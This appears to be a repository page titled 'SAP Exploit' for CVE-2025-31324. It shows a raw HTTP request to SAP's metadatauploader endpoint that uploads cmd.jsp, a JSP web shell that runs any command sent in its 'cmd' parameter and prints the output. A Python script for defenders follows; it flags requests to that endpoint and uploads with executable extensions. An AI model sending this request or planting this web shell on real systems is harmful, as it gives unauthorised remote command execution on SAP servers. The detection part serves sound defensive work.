redrays-io/CVE-2025-31324

CVE-2025-31324

CVE-2025-31324, SAP Exploit

POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, zstd
Accept: */*
Connection: keep-alive
Content-Length: 636
Content-Type: multipart/form-data; boundary=11111111111111111111111111

--11111111111111111111111111
Content-Disposition: form-data; name="file"; filename="cmd.jsp"
Content-Type: application/octet-stream

<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
    String cmd = request.getParameter("cmd");
    Process p = Runtime.getRuntime().exec(cmd);
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while (disr != null) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>

--11111111111111111111111111--
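
For defenders, the request above has two stable markers: the `/developmentserver/metadatauploader` path and a multipart part whose filename has a server-executable extension. The following check over captured raw requests is an added example, not code from this repository; the function names, the extension list and the sample request are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

UPLOADER_PATH = "/developmentserver/metadatauploader"  # endpoint in the request above
# Assumption: extensions a Java application server may execute or deploy.
EXECUTABLE_EXT = {"jsp", "jspx", "war", "jar", "class"}
FILENAME_RE = re.compile(r'filename\*?="?([^";\n]+)', re.IGNORECASE)

# Constructed sample: same shape as the request above, harmless body.
SAMPLE = (
    b"POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1\r\n"
    b"Host: sap.example.internal\r\n"
    b"Content-Type: multipart/form-data; boundary=b1\r\n\r\n"
    b'--b1\r\nContent-Disposition: form-data; name="file"; filename="cmd.jsp"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n"
    b"PLACEHOLDER\r\n--b1--\r\n"
)


def normalise_path(target: str) -> str:
    """Reduce a request target to a comparable path (deliberately lenient)."""
    path = unquote(target.split("?", 1)[0])   # drop query, percent-decode
    path = re.sub(r";[^/]*", "", path)        # strip ;path-parameters
    return re.sub(r"/+", "/", path).rstrip("/").lower()


def inspect_request(raw: bytes) -> list[str]:
    """Return findings for one raw HTTP request; an empty list means no match."""
    text = raw.decode("latin-1").replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")
    parts = head.split("\n", 1)[0].split(" ")
    if len(parts) != 3:
        return ["malformed request line"]
    method, target, _version = parts
    if normalise_path(target) != UPLOADER_PATH:
        return []
    findings = [f"{method} to {UPLOADER_PATH}"]
    for name in FILENAME_RE.findall(body):
        # Trailing dots/spaces and mixed case must not hide the extension.
        cleaned = unquote(name).strip(" .").lower()
        if "." in cleaned and cleaned.rsplit(".", 1)[1] in EXECUTABLE_EXT:
            findings.append(f"executable upload: {name}")
    return findings


if __name__ == "__main__":
    print(inspect_request(SAMPLE))
```

Any hit on the endpoint is reported even without an executable filename, so the first finding alone is worth triaging on hosts where this path should never receive traffic.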

CVE-2025-31324 SAP Penetration Testing SAP ABAP Code Scanner
